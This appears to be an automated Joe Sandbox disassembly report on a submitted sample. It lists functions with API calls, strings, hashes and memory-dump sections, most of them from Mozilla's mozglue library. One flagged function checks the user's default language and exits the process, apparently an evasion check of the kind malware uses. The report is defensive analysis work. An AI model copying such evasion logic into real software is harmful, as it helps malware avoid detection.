API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
String ID:
API String ID: 2325513730-0
Opcode ID: 79f65a23ce81e29cb825c196ab72a1a91e3cc8994f0b3021ff3e2e367a6a1060
Instruction ID: 4b3fd5c985ec4c6d3aae3cb2dfeb5821643b63e036cd5d9c7e7a4a2b8440d3f7
Opcode Fuzzy Hash: 79f65a23ce81e29cb825c196ab72a1a91e3cc8994f0b3021ff3e2e367a6a1060
Instruction Fuzzy Hash: 55418030B042059FCB10EF6AC8D9AAEB7F5EF89319F044069E50A97B91DB34DC05CB69

Function 6C5ECC60 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C5B31A7), ref: 6C5ECDDD

Strings

<jemalloc>, xrefs: 6C5ECF9F, 6C5ECFB3
: (malloc) Error in VirtualFree(), xrefs: 6C5ECFA4, 6C5ECFB8

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: AllocVirtual
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 4275171209-2186867486
Opcode ID: 33b54cf769e3ec013baaf5d57ff56e64710d8f2a6822e251f0a2637f14cf090e
Instruction ID: 2c46406bb5e63b9a5af08a15edd7f9d37b1e260a4e6f7119e8a8f6f8e0147b9c
Opcode Fuzzy Hash: 33b54cf769e3ec013baaf5d57ff56e64710d8f2a6822e251f0a2637f14cf090e
Instruction Fuzzy Hash: 24310A307402155BEF11AF658C45BAE7F75BB89704F306018F528AB6C0DB70E800CBA5

Function 6C5BECD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

Part of subcall function 6C5BF100: LoadLibraryW.KERNEL32(shell32,?,6C62D020), ref: 6C5BF122
Part of subcall function 6C5BF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C5BF132

moz_xmalloc.MOZGLUE(00000012), ref: 6C5BED50
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5BEDAC
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C5BEDCC
CreateFileW.KERNEL32 ref: 6C5BEE08
free.MOZGLUE(00000000), ref: 6C5BEE27
free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C5BEE32

Part of subcall function 6C5BEB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C5BEBB5
Part of subcall function 6C5BEB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C5ED7F3), ref: 6C5BEBC3
Part of subcall function 6C5BEB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C5ED7F3), ref: 6C5BEBD6

Strings

\Mozilla\Firefox\SkeletonUILock-, xrefs: 6C5BEDC1

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
String ID: \Mozilla\Firefox\SkeletonUILock-
API String ID: 1980384892-344433685
Opcode ID: 1741278934223465236ef6b29ec93f341acf2616d8143352d4d923c250402190
Instruction ID: da570501104558a01e3601350c5059b8b050a84747159472e28f6d64cb8c185b
Opcode Fuzzy Hash: 1741278934223465236ef6b29ec93f341acf2616d8143352d4d923c250402190
Instruction Fuzzy Hash: 5F51B371D05204DBDB10DF68CC506AEBBB0AF49318F48995DE8557B740E7B4AD48CBA2

Function 6C62A520 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C62A565

Part of subcall function 6C62A470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C62A4BE
Part of subcall function 6C62A470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C62A4D6

?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C62A65B
?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C62A6B6

Strings

0, xrefs: 6C62A5FB
z, xrefs: 6C62A6AE

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
String ID: 0$z
API String ID: 310210123-2584888582
Opcode ID: 2fdcebf7d8874105f5642092cbec7e43df0112e9d3e7c9419b394274788511b8
Instruction ID: 89f0e69874fe8a12dc66482f892d23c5e7c7a51deb6e46119eb7a1507a303a54
Opcode Fuzzy Hash: 2fdcebf7d8874105f5642092cbec7e43df0112e9d3e7c9419b394274788511b8
Instruction Fuzzy Hash: 364137719087459FC341DF28C480A8BBBE4BFC9354F408A2EF4998B651EB74E949CF86

Function 6C5F9420 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 6C5EAB89: EnterCriticalSection.KERNEL32(6C63E370,?,?,?,6C5B34DE,6C63F6CC,?,?,?,?,?,?,?,6C5B3284), ref: 6C5EAB94
Part of subcall function 6C5EAB89: LeaveCriticalSection.KERNEL32(6C63E370,?,6C5B34DE,6C63F6CC,?,?,?,?,?,?,?,6C5B3284,?,?,6C5D56F6), ref: 6C5EABD1

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C5C4A68), ref: 6C5F945E
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C5F9470
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C5F9482
__Init_thread_footer.LIBCMT ref: 6C5F949F

Strings

MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C5F9459
MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C5F946B
MOZ_BASE_PROFILER_LOGGING, xrefs: 6C5F947D

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
API String ID: 4042361484-1628757462
Opcode ID: c1af20afada0104b2231a4990da1287e3c13eb36a00f55ddf6b5bbdca44183bf
Instruction ID: 9e652ae615f57b9939b3c539ecad6a2db2cb356a49767f27746225b6343b3a4a
Opcode Fuzzy Hash: c1af20afada0104b2231a4990da1287e3c13eb36a00f55ddf6b5bbdca44183bf
Instruction Fuzzy Hash: B1012830A0051197D7209F6EDD88A4533B9EF05328F042576E95EC6B43D727D8568D5F

Function 00266770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetUserDefaultLangID.KERNEL32 ref: 00266774
ExitProcess.KERNEL32 ref: 002667A5
ExitProcess.KERNEL32 ref: 002667AF
ExitProcess.KERNEL32 ref: 002667B9
ExitProcess.KERNEL32 ref: 002667C3
ExitProcess.KERNEL32 ref: 002667CD

Strings

*, xrefs: 0026678C

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess$DefaultLangUser
String ID: *
API String ID: 1494266314-163128923
Opcode ID: cb0d9b68694d6cbabc94f721e06ef6d93f5dd084f42e3acb08c0cbfc632b14a1
Instruction ID: ff796a170eaff61bc6e34b2757ce9e2e57d2fcc6f62f91d172b86aec2fdabe6d
Opcode Fuzzy Hash: cb0d9b68694d6cbabc94f721e06ef6d93f5dd084f42e3acb08c0cbfc632b14a1
Instruction Fuzzy Hash: 29F05E30984209EFD344AFE0E90EB2CBB70FB14703F0401FAE609862D0D6708B619BDA

Function 6C62B540 Relevance: 12.1, APIs: 8, Instructions: 93COMMON

Download Yara Rule

APIs

?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6C62B5B9
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C62B5C5
??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C62B5DA
??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C62B5F4
__Init_thread_footer.LIBCMT ref: 6C62B605
?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6C62B61F
std::_Facet_Register.LIBCPMT ref: 6C62B631
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C62B655

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
String ID:
API String ID: 1276798925-0
Opcode ID: cf6ad4ec2140003e87f0ab3bc8885261af742a21e1b1521f046e17d09920eaa2
Instruction ID: 68d5dca3a5147de2aed23dcd273e5a795299f4350b4f5c4f72306e275c06f0db
Opcode Fuzzy Hash: cf6ad4ec2140003e87f0ab3bc8885261af742a21e1b1521f046e17d09920eaa2
Instruction Fuzzy Hash: 9231A671B00204CBCB11DF6AC8989AE77F5EBCA325F141555D90AA7740DB34AC06CF9A

Function 6C5F6590 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 342COMMON

Download Yara Rule

APIs

Part of subcall function 6C5EFA80: GetCurrentThreadId.KERNEL32 ref: 6C5EFA8D
Part of subcall function 6C5EFA80: AcquireSRWLockExclusive.KERNEL32(6C63F448), ref: 6C5EFA99

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C5F6727
?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6C5F67C8

Part of subcall function 6C604290: memcpy.VCRUNTIME140(?,?,6C612003,6C610AD9,?,6C610AD9,00000000,?,6C610AD9,?,00000004,?,6C611A62,?,6C612003,?), ref: 6C6042C4

Strings

data, xrefs: 6C5F6593
vcl, xrefs: 6C5F696C

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
String ID: data$vcl
API String ID: 511789754-1481751588
Opcode ID: cc5bf5b08b220a8587887b1203c595fdfef14cf4ff0205a8f12aae8f95737950
Instruction ID: 91307301b50db3a0d1791826238cb03913550f3091c15edf557d1d10096dd140
Opcode Fuzzy Hash: cc5bf5b08b220a8587887b1203c595fdfef14cf4ff0205a8f12aae8f95737950
Instruction Fuzzy Hash: A4D1D075A08340CFD728DF25C840B9FB7E5AFD5308F10492DE49997B91EB70A84ACB56

Function 6C5ED5D0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 279COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6C5BEB57,?,?,?,?,?,?,?,?,?), ref: 6C5ED652
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C5BEB57,?), ref: 6C5ED660
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C5BEB57,?), ref: 6C5ED673
free.MOZGLUE(?), ref: 6C5ED888

Strings

W[l, xrefs: 6C5ED5D9, 6C5ED63F
|Enabled, xrefs: 6C5ED81E

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: free$memsetmoz_xmalloc
String ID: W[l$|Enabled
API String ID: 4142949111-1205718397
Opcode ID: 2c17a2aa47c08ee3e7c7b8a88e6d2b135064ca5925ef8caad49c9fd8ba69b8e9
Instruction ID: 4090094ce0b69be2b3679f0e1f8e37bc8c3a0f1afecf6d726c4f8d6e6de23ba7
Opcode Fuzzy Hash: 2c17a2aa47c08ee3e7c7b8a88e6d2b135064ca5925ef8caad49c9fd8ba69b8e9
Instruction Fuzzy Hash: B9A1D3B0A043198FDB11CF69C8D07AEBBF1AF8D318F18845CD889AB741D735A945CBA1

Function 6C601D00 Relevance: 10.6, APIs: 7, Instructions: 115threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C601D0F
AcquireSRWLockExclusive.KERNEL32(?,?,6C601BE3,?,?,6C601D96,00000000), ref: 6C601D18
ReleaseSRWLockExclusive.KERNEL32(?,?,6C601BE3,?,?,6C601D96,00000000), ref: 6C601D4C
GetCurrentThreadId.KERNEL32 ref: 6C601DB7
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C601DC0
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C601DDA

Part of subcall function 6C601EF0: GetCurrentThreadId.KERNEL32 ref: 6C601F03
Part of subcall function 6C601EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6C601DF2,00000000,00000000), ref: 6C601F0C
Part of subcall function 6C601EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6C601F20

moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6C601DF4

Part of subcall function 6C5CCA10: malloc.MOZGLUE(?), ref: 6C5CCA26

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
String ID:
API String ID: 1880959753-0
Opcode ID: 7dad9c9ab1490c1b06377dedfb33840272902797826d3184bffd6e66c4bf6896
Instruction ID: 52cced525aa74f6e55a28ec4a0f312b3f8adf201d47767f90b4d0b7501f5d149
Opcode Fuzzy Hash: 7dad9c9ab1490c1b06377dedfb33840272902797826d3184bffd6e66c4bf6896
Instruction Fuzzy Hash: 24417B752007009FCB24DF29C988A56BBF9FF89318F10442DE95A87B81CB71F814CB99

Function 6C5F84E0 Relevance: 10.6, APIs: 7, Instructions: 79COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C5F84F3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C5F850A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C5F851E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C5F855B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C5F856F
??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C5F85AC

Part of subcall function 6C5F7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C5F85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C5F767F
Part of subcall function 6C5F7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C5F85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C5F7693
Part of subcall function 6C5F7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C5F85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C5F76A7

free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C5F85B2

Part of subcall function 6C5D5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C5D5EDB
Part of subcall function 6C5D5E90: memset.VCRUNTIME140(ewal,000000E5,?), ref: 6C5D5F27
Part of subcall function 6C5D5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C5D5FB2

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
String ID:
API String ID: 2666944752-0
Opcode ID: ebc9e3c44045afbf66fbac375f3571ef2f1f398cdf7e1ab1ebab3f5f9a81e338
Instruction ID: 00337f1d4ba4d207a3d20746ad4d56434360444d3be7a10a1c07e43a150ab6e8
Opcode Fuzzy Hash: ebc9e3c44045afbf66fbac375f3571ef2f1f398cdf7e1ab1ebab3f5f9a81e338
Instruction Fuzzy Hash: C221E175200601AFDB18DB26CCC8A5A77B5AF8230CF10492CE56BC3B42DB35F849CB46

Function 002692E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(:&,80000000,00000003,00000000,00000003,00000080,00000000,?,00263AEE,?), ref: 002692FC
GetFileSizeEx.KERNEL32(000000FF,:&), ref: 00269319
CloseHandle.KERNEL32(000000FF), ref: 00269327

Strings

:&, xrefs: 002692F8, 002692FB
:&, xrefs: 00269311, 0026933D, 00269314

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID: :&$:&
API String ID: 1378416451-3900059077
Opcode ID: 033359d4b358a239fddc81d7b307c9ea4517c10cb82e4976403a0878e1a21959
Instruction ID: 7b214c8d54071abbb90e5827418a3ff4392b6c6e4ee2efb08a89e88485bc67b0
Opcode Fuzzy Hash: 033359d4b358a239fddc81d7b307c9ea4517c10cb82e4976403a0878e1a21959
Instruction Fuzzy Hash: 8AF04F35E50208BBDB10DFF0DC49F9E77B9AB58710F10C2A4BA51A72C0DA709AA18F84

Function 6C5FF540 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C5F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C5C4A68), ref: 6C5F945E
Part of subcall function 6C5F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C5F9470
Part of subcall function 6C5F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C5F9482
Part of subcall function 6C5F9420: __Init_thread_footer.LIBCMT ref: 6C5F949F

GetCurrentThreadId.KERNEL32 ref: 6C5FF559
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C5FF561

Part of subcall function 6C5F94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C5F94EE
